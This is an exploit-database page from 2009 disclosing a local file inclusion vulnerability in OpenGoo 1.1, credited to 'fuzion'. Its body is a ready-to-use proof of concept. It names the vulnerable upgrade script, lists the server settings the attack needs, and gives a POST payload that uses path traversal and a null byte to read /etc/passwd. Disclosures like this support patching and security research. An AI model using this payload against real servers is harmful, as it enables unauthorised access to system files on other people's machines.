[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : OpenGoo 1.1 (script_class) Local File Inclusion Vulnerability
# Published : 2009-01-25
# Author : fuzion
# Previous Title : Flax Article Manager 1.1 (cat_id) SQL Injection Vulnerability
# Next Title : EPOLL SYSTEM 3.1 (password.dat) Disclosure Exploit


OpenGoo 1.1 Local File Inclusion
http://www.opengoo.org/

magic_quotes_gpc = Off
register_globals = On

http://site/opengoo/public/upgrade/index.php
POST: form_data[script_class]=/../../../../../../../../../../../etc/passwd%00.html

Author Notified: Jan. 18

http://nukeit.org

# www.Syue.com [2009-01-25]